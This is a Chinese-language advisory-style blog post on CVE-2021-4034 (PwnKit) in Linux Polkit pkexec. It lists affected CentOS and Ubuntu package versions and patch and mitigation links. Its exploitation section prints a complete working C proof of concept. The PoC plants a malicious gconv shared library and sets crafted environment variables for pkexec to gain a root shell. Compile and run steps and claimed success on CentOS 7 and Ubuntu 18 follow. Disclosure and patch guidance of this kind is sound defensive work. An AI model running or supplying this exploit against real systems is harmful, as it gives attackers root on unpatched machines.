CVE-2021-4034 Linux Polkit pkexec权限提升漏洞

0x01 CVE-2021-4034 漏洞详情

Polkit(PolicyKit)是一个用于控制类Unix系统中系统范围权限的组件,它为非特权进程与特权进程的通信提供了一种有组织的方式。pkexec是Polkit开源应用框架的一部分,它负责协商特权进程和非特权进程之间的互动,允许授权用户以另一个用户的身份执行命令,是sudo的替代方案。

1月25日,研究人员公开披露了在 polkit 的 pkexec 中发现的一个权限提升漏洞(CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux 发行版的默认配置中。受影响版本的 pkexec 无法正确处理调用参数计数,最终尝试将环境变量作为命令执行,攻击者可以通过修改环境变量来利用此漏洞,诱使 pkexec 执行任意代码,从而导致将本地权限提升为root。

0x02 影响范围

自2009年以来的所有 Polkit 版本(存在于所有主流的 Linux 发行版中)

CentOS系列:

CentOS 6:polkit-0.96-11.el6_10.2

CentOS 7:polkit-0.112-26.el7_9.1

CentOS 8.0:polkit-0.115-13.el8_5.1

CentOS 8.2:polkit-0.115-11.el8_2.2

CentOS 8.4:polkit-0.115-11.el8_4.2

Ubuntu系列:

Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2

Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6

Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1

Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

0x03 利用

利用十分简单

1、下载

https://github.com/arthepsy/CVE-2021-4034

1
git clone https://github.com/arthepsy/CVE-2021-4034

由于代码简单,也可以直接写到文件中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell =
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";

int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

2、编译

1
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc

3、运行

1
./cve-2021-4034-poc

4、成功

Centos7

image-20220126155148796

Ubuntu18

image-20220126155212034

0x04 修复方案

通用修补建议

根据影响版本中的信息,排查并升级到安全版本

临时修补建议

目前此漏洞已经修复,建议受影响用户及时升级更新。

补丁下载链接:

https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683

注:

1.Ubuntu已经为PolicyKit推送了更新,以解决14.04和16.04 ESM版本以及最近的18.04、20.04和21.04版本中的漏洞。

下载链接:

https://ubuntu.com/security/notices/USN-5252-2

2.Red Hat已经为 Workstation 和 Enterprise 产品上的polkit提供了安全更新。

下载链接:

https://access.redhat.com/security/security-updates/#/security-advisories

3.如果系统没有可用的补丁,可以从 pkexec 中删除 SUID 位作为临时缓解措施,如:chmod 0755 /usr/bin/pkexec

参考链接:

https://www.venustech.com.cn/new\_type/aqtg/20220126/23411.html

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

https://www.bleepingcomputer.com/news/security/linux-system-service-bug-gives-root-on-all-major-distros-exploit-released/

https://access.redhat.com/security/cve/cve-2021-4034